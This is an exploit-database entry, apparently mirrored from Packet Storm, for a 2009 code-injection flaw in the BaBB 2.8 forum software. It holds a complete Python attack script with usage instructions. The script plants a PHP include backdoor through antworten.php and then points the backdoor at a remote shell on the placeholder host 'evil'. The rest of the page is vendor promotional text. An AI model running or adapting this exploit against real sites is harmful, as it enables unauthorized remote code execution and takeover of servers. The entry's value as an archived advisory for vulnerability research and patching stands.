Lucene search
K

BaBB 2.8 Code Injection

🗓️ 18 Aug 2009 00:00:00Reported by IRCRASHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

BaBB 2.8 Code Injection exploit allowing remote execution of arbitrary PHP code.

Code
`#!usr/bin/python  
#####################################################################################  
#### BaBB 2.8 Full Code Injection Exploit ####  
#####################################################################################  
# #  
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #  
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #  
#Our Site : http://IrCrash.com #  
#My Official WebSite : http://R3dW0rm.ir #  
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #  
#####################################################################################  
# #  
#Download : http://sunet.dl.sourceforge.net/project/babb/BaBB%20Full/BaBB%202.8/BaBB_2.8_full.zip  
# #  
#Dork : :( #  
# #  
###################################### TNX GOD ######################################  
import sys,urllib  
if len(sys.argv) < 2 :  
print "Powered by : R3d.W0rm"  
print "http://IrCrash.com - http://R3dW0rm.ir"  
print "Usage : expl.py http://[target]/[path]"  
exit()  
data = urllib.urlopen(sys.argv[1] + '/antworten.php?send=true&code=/../../../BaBB.php&name=<?php%20if($_GET[\'t\']==1){include%20$_GET[\'f\'];}/*').read()  
if data != '' :  
print "Powered by : R3d.W0rm"  
print "http://IrCrash.com - http://R3dW0rm.ir\n\r"  
print sys.argv[1] + "/BaBB.php?t=1&f=http://evil/shell.txt"  
exit()  
print 'Attack failed.'  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation